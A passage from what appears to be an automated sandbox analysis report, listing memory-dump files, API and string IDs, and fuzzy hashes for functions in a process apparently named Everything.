                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileLast
                                                                                                            • String ID: failed to open directory %d
                                                                                                            • API String ID: 1214770103-947401544
                                                                                                            • Opcode ID: 2d2da7f4a285b735170b0c11be7930928b787cf406eb6f2d36bfa635a0f2271a
                                                                                                            • Instruction ID: ee1a74f0ebbecbde38b68c9bd514871c1c9719d9aa7e5d6f736d9dd7feaea0f5
                                                                                                            • Opcode Fuzzy Hash: 2d2da7f4a285b735170b0c11be7930928b787cf406eb6f2d36bfa635a0f2271a
                                                                                                            • Instruction Fuzzy Hash: A911B431A1C64A91EB209B65F4503AA7360EF857A4F500239EE6DC7BD9EF3DD414AB40
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCriticalEnterEventHandleObjectSectionSingleWait
                                                                                                            • String ID: restart folder read directory changes monitor %s %p
                                                                                                            • API String ID: 2183055276-745975738
                                                                                                            • Opcode ID: 5423d13eb52e1f77d355fc31562a0ffa5d2c0faaa1981bfa674e61689fecbd1e
                                                                                                            • Instruction ID: 40f1204bb7a8361e7858cc2847d29c771438cc902597fb88244248671da95b8e
                                                                                                            • Opcode Fuzzy Hash: 5423d13eb52e1f77d355fc31562a0ffa5d2c0faaa1981bfa674e61689fecbd1e
                                                                                                            • Instruction Fuzzy Hash: D6116D21906B8684F7809FA1E8543AD23A1FB98B68F084135CE9C877D5EF3AD4A4D311